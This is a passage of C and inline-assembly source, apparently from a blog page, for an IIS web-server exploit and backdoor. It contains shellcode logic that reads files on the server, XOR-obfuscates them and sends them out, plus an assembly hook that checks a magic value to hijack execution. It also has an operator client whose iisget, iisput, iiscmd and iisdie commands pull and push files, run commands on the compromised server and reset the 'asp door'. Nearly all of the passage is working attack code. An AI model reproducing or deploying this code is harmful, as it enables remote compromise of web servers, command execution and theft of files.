                //         fpt=CreateFileAadd(Buff+4,GENERIC_READ,FILE_SHARE
_READ,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
                         fpt=CreateFileAadd(Buff+4,GENERIC_READ,FILE_SHARE_R
EAD+FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
                         Sleepadd(100);
                         l=GetFileSizeadd(fpt,&k);
                         *(int *)Buff='ezis';        //size
                         *(int *)(Buff+4)=l;
                         lBytesRead=8;
                          for(i=0;i<lBytesRead;++i){
                              lockintvar2=lockintvar2*0x100;
                              lockintvar2=lockintvar2%LOCKBIGNUM;
                              lockcharvar=lockintvar2%0x100;
                              Buff[i]^=lockcharvar;   // DATAXORCODE;
                          }
                         writeclient(ConnID,Buff,&lBytesRead,0); // HSE_IO_S
YNC);
                   //      Sleepadd(100);
                         i=0;
                         while(l>0){
                              k=SHELLBUFFSIZE;
                              ReadFileadd(fpt,Buff,k,&k,0);
                              if(k>0){
                                 for(i=0;i<k;++i){
                                      lockintvar2=lockintvar2*0x100;
                                      lockintvar2=lockintvar2%LOCKBIGNUM;
                                      lockcharvar=lockintvar2%0x100;
                                      Buff[i]^=lockcharvar;   // DATAXORCODE
;
                                 }
                                 i=0;
                                 l-=k;
                                 writeclient(ConnID,Buff,&k,0); // HSE_IO_SY
NC);
//                                   Sleepadd(100);
              //                   k=readclient(ConnID,Buff,&lBytesRead);
                                 }
                              else ++i;
                              if(i>100) l=0;
                         }
                         CloseHandleadd(fpt);
                         l=0;
                     }
                     else l=1;
                 }
              }
              if(k!=1){
                k=8;
                WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe
                WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe
                WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe
                k=GetLastErroradd();
                while(k==0x2746){
                  if(thedoor==1)      goto asmreturn;
                  Sleepadd(0x7fffffff);                  //僵死
                }
              }
              else{
                 WriteFileadd(hWritePipe2,Buff,lBytesRead,&lBytesRead,0);
  //              Sleepadd(1000);
              }
        }
    }
    die: goto die  ;
      _asm{
asmreturn:
                   mov eax,HSE_STATUS_SUCCESS
                   leave
                   ret 04
door:              push eax
                   mov eax,[esp+0x08]
                   mov eax,[eax+0x64]
                   mov eax,[eax]
                   cmp eax,'ok!!'
                   jnz jmpold
                   pop eax
                   push 0x12345678  //dooradd-0x13
                   ret
jmpold:               pop  eax
                   push 0x12345678   //dooradd-0xc
                   ret               //1
                   jmp  door         //2
getdoorcall:       call getdooradd   //5
getexceptretadd:   pop  eax
                   push eax
                   mov  edi,dword ptr [stradd]
                   mov dword ptr [edi-0x0e],eax
                   ret
errprogram:           mov eax,dword ptr [esp+0x0c]
                   add eax,0xb8
                   mov dword ptr [eax],0x11223344  //stradd-0xe
                   xor eax,eax                //2
                   ret                        //1
execptprogram:     jmp errprogram            //2 bytes     stradd-7
nextcall:          call getstradd            //5 bytes
                   NOP
                   NOP
                   NOP
                   NOP
                   NOP
                   NOP
                   NOP
                   NOP
                   NOP
        }
}
void cleanchkesp(char *fnadd,char *shellbuff,char * chkesp,int len)
{
   int i,k;
   unsigned char temp;
   char *calladd;
   for(i=0;i<len;++i){
       temp=shellbuff[i];
       if(temp==0xe8){
         k=*(int *)(shellbuff+i+1);
         calladd=fnadd;
         calladd+=k;
         calladd+=i;
         calladd+=5;
         if(calladd==chkesp){
             shellbuff[i]=0x90;
             shellbuff[i+1]=0x43;   // inc ebx
             shellbuff[i+2]=0x4b;    // dec ebx
             shellbuff[i+3]=0x43;
             shellbuff[i+4]=0x4b;
         }
       }
   }
}
void iisput(int fd,char *str){
char *filename;
char *filename2;
FILE *fpt;
char buff[0x2000];
int size=0x2000,i,j,filesize,filesizehigh;
filename="/0";
filename2="/0";
j=strlen(str);
for(i=0;i<j;++i,++str){
     if(*str!=' '){
         filename=str;
         break;
     }
}
for(;i<j;++i,++str){
     if(*str==' ') {
         *str=0;
         break;
     }
}
++i;
++str;
for(;i<j;++i,++str){
     if(*str!=' '){
       filename2=str;
       break;
     }
}
for(;i<j;++i,++str){
     if(*str==' ') {
         *str=0;
         break;
     }
}
if(filename=="/x0") {
     printf("/n iisput filename [path//fiename]/n");
     return;
}
if(filename2=="/x0") filename2=filename;
printf("/n begin put file:%s",filename);
j=0;
ioctlsocket(fd, FIONBIO, &j);
Sleep(1000);
fpt=CreateFile(filename,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,FILE
_ATTRIBUTE_NORMAL,0);
filesize=GetFileSize(fpt,&filesizehigh);
strcpy(buff,"put ");
*(int *)(buff+4)=filesize;
filesize=*(int *)(buff+4);
strcpy(buff+0x8,filename2);
newsend(fd,buff,i+0x9,0);
printf("/n put file:%s to file:%s %d bytes",filename,filename2,filesize);
Sleep(1000);
while(filesize>0){
      size=0x800;
      ReadFile(fpt,buff,size,&size,NULL);
      if(size>0){
          filesize-=size;
          newsend(fd,buff,size,0);
//          Sleep(0100);
      }
}
// size=filesize;
// ReadFile(fpt,buff,size,&size,NULL);
// if(size>0) send(fd,buff,size,0);
CloseHandle(fpt);
j=1;
ioctlsocket(fd, FIONBIO, &j);
printf("/n put file ok!/n");
Sleep(1000);
}
void iisget(int fd,char *str){
char *filename;
char *filename2;
FILE *fpt;
char buff[0x2000];
int size=0x2000,i,j,filesize,filesizehigh;
filename="/0";
filename2="/0";
j=strlen(str);
for(i=0;i<j;++i,++str){
     if(*str!=' '){
         filename=str;
         break;
     }
}
for(;i<j;++i,++str){
     if(*str==' ') {
         *str=0;
         break;
     }
}
++i;
++str;
for(;i<j;++i,++str){
     if(*str!=' '){
       filename2=str;
       break;
     }
}
for(;i<j;++i,++str){
     if(*str==' ') {
         *str=0;
         break;
     }
}
if(filename=="/x0") {
     printf("/n iisget filename [path//fiename]/n");
     return;
}
if(filename2=="/x0") filename2=filename;
printf("/n begin get file:%s",filename);
fpt=CreateFileA(filename,FILE_FLAG_WRITE_THROUGH+GENERIC_WRITE,FILE_SHARE_RE
AD,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
strcpy(buff,"get ");
strcpy(buff+0x4,filename2);
newsend(fd,buff,i+0x5,0);
printf("/n get file:%s from file:%s",filename,filename2);
  j=0;
  ioctlsocket(fd, FIONBIO, &j);
i=0;
filesize=0;
j=0;
while(j<100){
//    Sleep(100);
    i=newrecv(fd,buff,0x800,0);
    if(i>0){
        buff[i]=0;
        if(memcmp(buff,"size",4)==0){
            filesize=*(int *)(buff+4);
            j=100;
        }
        else {
/*              for(j=0;j<i;++j){
                lockintvar1=lockintvar1*0x100;
                lockintvar1=lockintvar1%LOCKBIGNUM;
                lockcharvar=lockintvar1%0x100;
                buff[j]^=lockcharvar;   // DATAXORCODE;
              }
*/
              j=0;
              printf("/n recv %s",buff);
        }
    }
    else ++j;
//    if(j>1000) i=0;
}
printf("/n file %d bytes %d/n",filesize,i);
if(i>8){
      i-=8;
      filesize-=i;
      WriteFile(fpt,buff+8,i,&i,NULL);
}
while(filesize>0){
          size=newrecv(fd,buff,0x800,0);
          if(size>0){
             filesize-=size;
             WriteFile(fpt,buff,size,&size,NULL);
          }
          else {
              if(size==0) {
               printf("/n ftp close /n ");
              }
              else {
                  printf("/n Sleep(100)");
                  Sleep(100);
              }
          }
}
CloseHandle(fpt);
printf("/n get file ok!/n");
j=1;
ioctlsocket(fd, FIONBIO, &j);
}
void iisreset(int fd,char *str){
    char buff[0x2000];
    int  i,j;
    printf("/nreset xor data./n");
    Sleep(1000);
    j=0;
    ioctlsocket(fd, FIONBIO, &j);
    strcpy(buff,"reset");
    newsend(fd,buff,strlen(buff),0);
    Sleep(1000);
    lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
    lockintvar2=lockintvar1;
    while(1){
      j=recv(fd,buff,0x2000,0);
      if(j>0){
          buff[j]=0;
          for(i=0;i<j;++i){
              if(buff[i]==0) buff[i]='b';
          }
    //      printf("/nrecv 0x%x bytes:%s",j,buff);
          if(strstr(buff,"xordatareset")!=0){
              printf("/nxor data reset ok./n");
             for(i=strstr(buff,"xordatareset")-buff+0x0c;i<j;++i){
                lockintvar1=lockintvar1*0x100;
                lockintvar1=lockintvar1%LOCKBIGNUM;
                lockcharvar=lockintvar1%0x100;
                buff[i]^=lockcharvar;   // DATAXORCODE;
              }
              break;
          }
      }
//      else if(j==0) break;
//      strcpy(buff,"/r/nmkdir d://test6/r/n");
//      newsend(fd,buff,strlen(buff),0);
    }
    Sleep(1000);
    j=1;
    ioctlsocket(fd, FIONBIO, &j);
//    printf("aaa");
}
void iisdie(int fd,char *str){
    char buff[0x200];
    int  j;
    printf("/niis die./n");
    j=0;
    ioctlsocket(fd, FIONBIO, &j);
    Sleep(1000);
    strcpy(buff,"iisrr ");
    newsend(fd,buff,strlen(buff),0);
    Sleep(1000);
    j=1;
    ioctlsocket(fd, FIONBIO, &j);
    lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
    lockintvar2=lockintvar1;
}
void iiscmd(int fd,char *str){
    char *cmd="/0";
    char buff[2000];
    int  i,j;
    j=strlen(str);
    for(i=0;i<j;++i,++str){
      if(*str!=' '){
          cmd=str;
         break;
      }
    }
    j=strlen(str);
    for(i=0;i<j;++i){
       if(*(str+j-i-1)!=' ') {
           break;
       }
       else *(str+j-i-1)=0;
    }
    if(cmd=="/x0") {
        printf("/niiscmd cmd/n");
        return;
    }
    printf("/nbegin run cmd:%s",cmd);
    j=0;
    ioctlsocket(fd, FIONBIO, &j);
    Sleep(1000);
    strcpy(buff,"iisc ");
    strcat(buff,cmd);
    newsend(fd,buff,strlen(buff),0);
    Sleep(1000);
    j=1;
    ioctlsocket(fd, FIONBIO, &j);
/*
    lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
    lockintvar2=lockintvar1;
*/
}
int newrecv(int fd,char *buff,int size,int flag){
    int i,k;
    k=recv(fd,buff,size,flag);
    if(xordatabegin==1){
              for(i=0;i<k;++i){
                lockintvar1=lockintvar1*0x100;
                lockintvar1=lockintvar1%LOCKBIGNUM;
                lockcharvar=lockintvar1%0x100;
                buff[i]^=lockcharvar;   // DATAXORCODE;
              }
    }
    else{
        if(k>0){
            buff[k]=0;
            if(strstr(buff,"XORDATA")!=0) {
              xordatabegin=1;
              for(i=strstr(buff,"XORDATA")-buff+8;i<k;++i){
                lockintvar1=lockintvar1*0x100;
                lockintvar1=lockintvar1%LOCKBIGNUM;
                lockcharvar=lockintvar1%0x100;
                buff[i]^=lockcharvar;   // DATAXORCODE;
              }
            }
         }
    }
    return(k);
}
int newsend(int fd,char *buff,int size,int flag){
          int i;
          for(i=0;i<size;++i){
                lockintvar2=lockintvar2*0x100;
                lockintvar2=lockintvar2%LOCKBIGNUM;
                lockcharvar=lockintvar2%0x100;
                buff[i]^=lockcharvar;   // DATAXORCODE;
  //              buff[i]^=DATAXORCODE;
          }
      return(send(fd,buff,size,flag));
}
void iishelp(){
  printf("/nusage:");
  printf("/niisget filename filename.  get file from web server.");
  printf("/niisput filename filename.  put file to web server.");
  printf("/niiscmd cmd.  run cmd on web server.");
  printf("/niisreset.  reset the xor data.");
  printf("/niisdie.  reset the asp door.");
  printf("/n/n");
}
阅读全文
0 0

相关文章推荐

img
取 消
img